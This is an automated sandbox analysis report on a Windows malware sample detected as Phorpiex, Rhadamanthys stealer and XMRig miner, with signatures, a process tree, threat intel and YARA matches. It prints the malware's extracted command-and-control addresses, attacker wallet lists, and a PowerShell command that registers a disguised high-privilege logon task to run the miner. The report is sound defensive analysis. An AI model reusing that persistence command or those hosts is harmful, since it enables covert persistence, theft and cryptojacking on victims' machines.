Edit tour

Windows Analysis Report
f5TWdT5EAc.exe

Overview

General Information

Sample name:	f5TWdT5EAc.exe renamed because original name is a hash value
Original sample name:	b992a18f00c902840fcd2bb93223a8cd58d0da1d9e142a90523931aa3f140276.exe
Analysis ID:	1569290
MD5:	001c8845e2489435657b200199b369f8
SHA1:	1891627447cdb5bdcb50e39987084d112923a155
SHA256:	b992a18f00c902840fcd2bb93223a8cd58d0da1d9e142a90523931aa3f140276
Tags:	exeuser-adrian__luca
Infos:

Detection

Phorpiex, RHADAMANTHYS, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Phorpiex

Yara detected RHADAMANTHYS Stealer

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to check if Internet connection is working

Contains functionality to detect sleep reduction / modifications

Detected Stratum mining protocol

Drops executables to the windows directory (C:\Windows) and starts them

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking mutex)

Found hidden mapped module (file has been removed from disk)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses Register-ScheduledTask to add task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

f5TWdT5EAc.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\f5TWdT5EAc.exe" MD5: 001C8845E2489435657B200199B369F8)

34D7.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Local\Temp\34D7.exe" MD5: 08DAFE3BB2654C06EAD4BB33FB793DF8)

896429707.exe (PID: 7668 cmdline: C:\Users\user\AppData\Local\Temp\896429707.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)

sysnldcvmr.exe (PID: 7744 cmdline: C:\Windows\sysnldcvmr.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)

1171111125.exe (PID: 8016 cmdline: C:\Users\user\AppData\Local\Temp\1171111125.exe MD5: 323CB4364490F83204B51B0F7F3766F4)

2779421088.exe (PID: 8088 cmdline: C:\Users\user\AppData\Local\Temp\2779421088.exe MD5: BD0CAD52FD3A6537CC7AF21852619340)

svchost.exe (PID: 8108 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

fontdrvhost.exe (PID: 5444 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)

WerFault.exe (PID: 6788 cmdline: C:\Windows\system32\WerFault.exe -u -p 5444 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

78476062.exe (PID: 8160 cmdline: C:\Users\user\AppData\Local\Temp\78476062.exe MD5: 96509AB828867D81C1693B614B22F41D)

2688734187.exe (PID: 2652 cmdline: C:\Users\user\AppData\Local\Temp\2688734187.exe MD5: 13B26B2C7048A92D6A843C1302618FAD)

640832494.exe (PID: 4468 cmdline: C:\Users\user\AppData\Local\Temp\640832494.exe MD5: 84897CA8C1AA06B33248956AC25EC20A)

1657630034.exe (PID: 5420 cmdline: C:\Users\user\AppData\Local\Temp\1657630034.exe MD5: 77C5EB90118287F666886FC34210C176)

2910625892.exe (PID: 1852 cmdline: C:\Users\user\AppData\Local\Temp\2910625892.exe MD5: 69A5D3C6E993B5A1BAFACF806647DF7D)

WerFault.exe (PID: 1232 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1332 MD5: C31336C1EFC2CCB44B4326EA793040F2)

sysnldcvmr.exe (PID: 8000 cmdline: "C:\Windows\sysnldcvmr.exe" MD5: 0C883B1D66AFCE606D9830F48D69D74B)

svchost.exe (PID: 2660 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 2744 cmdline: C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 912 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1852 -ip 1852 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 5372 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

powershell.exe (PID: 7296 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

winupsecvmgr.exe (PID: 2960 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)

conhost.exe (PID: 4828 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

dwm.exe (PID: 3728 cmdline: C:\Windows\System32\dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)

powershell.exe (PID: 2024 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4960 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7980 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6772 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

winupsecvmgr.exe (PID: 3820 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)

powershell.exe (PID: 3464 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Phorpiex	Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.	No Attribution	https://bin.re/blog/phorpiex/ https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/ https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html https://research.checkpoint.com/2019/phorpiex-breakdown/ https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/	https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: Phorpiex

{"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb"]}

Threatname: Rhadamanthys

{"C2 url": "https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0f"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000003.1606124598.00000000027F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000A.00000002.1704824267.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000003.1602277553.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f0588:$a1: mining.set_target 0x4ebd68:$a2: XMRIG_HOSTNAME 0x4ed860:$a3: Usage: xmrig [OPTIONS] 0x4ebd40:$a4: XMRIG_VERSION
0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000003.1606012463.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000023.00000002.3945886291.000001A567EC2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000001D.00000002.2779057358.00007FF731CEB000.00000004.00000001.01000000.00000015.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f0588:$a1: mining.set_target 0x4ebd68:$a2: XMRIG_HOSTNAME 0x4ed860:$a3: Usage: xmrig [OPTIONS] 0x4ebd40:$a4: XMRIG_VERSION
00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: 896429707.exe PID: 7668	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysnldcvmr.exe PID: 7744	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysnldcvmr.exe PID: 8000	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: 2779421088.exe PID: 8088	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost.exe PID: 8108	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.3.2779421088.exe.35a0000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.3.2779421088.exe.3380000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.svchost.exe.50e0000.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.svchost.exe.50e0000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.svchost.exe.4ec0000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x509d88:$a1: mining.set_target 0x505568:$a2: XMRIG_HOSTNAME 0x507060:$a3: Usage: xmrig [OPTIONS] 0x505540:$a4: XMRIG_VERSION
29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x50fd61:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
29.2.winupsecvmgr.exe.7ff731cd0000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x5102c0:$s1: %s/%s (Windows NT %lu.%lu 0x510ae8:$s3: \\.\WinRing0_ 0x508fe8:$s4: pool_wallet 0x504df0:$s5: cryptonight 0x504e00:$s5: cryptonight 0x504e10:$s5: cryptonight 0x504e20:$s5: cryptonight 0x504e38:$s5: cryptonight 0x504e48:$s5: cryptonight 0x504e58:$s5: cryptonight 0x504e70:$s5: cryptonight 0x504e80:$s5: cryptonight 0x504e98:$s5: cryptonight 0x504eb0:$s5: cryptonight 0x504ec0:$s5: cryptonight 0x504ed0:$s5: cryptonight 0x504ee0:$s5: cryptonight 0x504ef8:$s5: cryptonight 0x504f10:$s5: cryptonight 0x504f20:$s5: cryptonight 0x504f30:$s5: cryptonight
47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
47.2.winupsecvmgr.exe.7ff7a1f2ca40.2.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x509d88:$a1: mining.set_target 0x505568:$a2: XMRIG_HOSTNAME 0x507060:$a3: Usage: xmrig [OPTIONS] 0x505540:$a4: XMRIG_VERSION
47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x50fd61:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
47.2.winupsecvmgr.exe.7ff7a1ef0000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x5102c0:$s1: %s/%s (Windows NT %lu.%lu 0x510ae8:$s3: \\.\WinRing0_ 0x508fe8:$s4: pool_wallet 0x504df0:$s5: cryptonight 0x504e00:$s5: cryptonight 0x504e10:$s5: cryptonight 0x504e20:$s5: cryptonight 0x504e38:$s5: cryptonight 0x504e48:$s5: cryptonight 0x504e58:$s5: cryptonight 0x504e70:$s5: cryptonight 0x504e80:$s5: cryptonight 0x504e98:$s5: cryptonight 0x504eb0:$s5: cryptonight 0x504ec0:$s5: cryptonight 0x504ed0:$s5: cryptonight 0x504ee0:$s5: cryptonight 0x504ef8:$s5: cryptonight 0x504f10:$s5: cryptonight 0x504f20:$s5: cryptonight 0x504f30:$s5: cryptonight
47.2.winupsecvmgr.exe.7ff7a1f30320.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
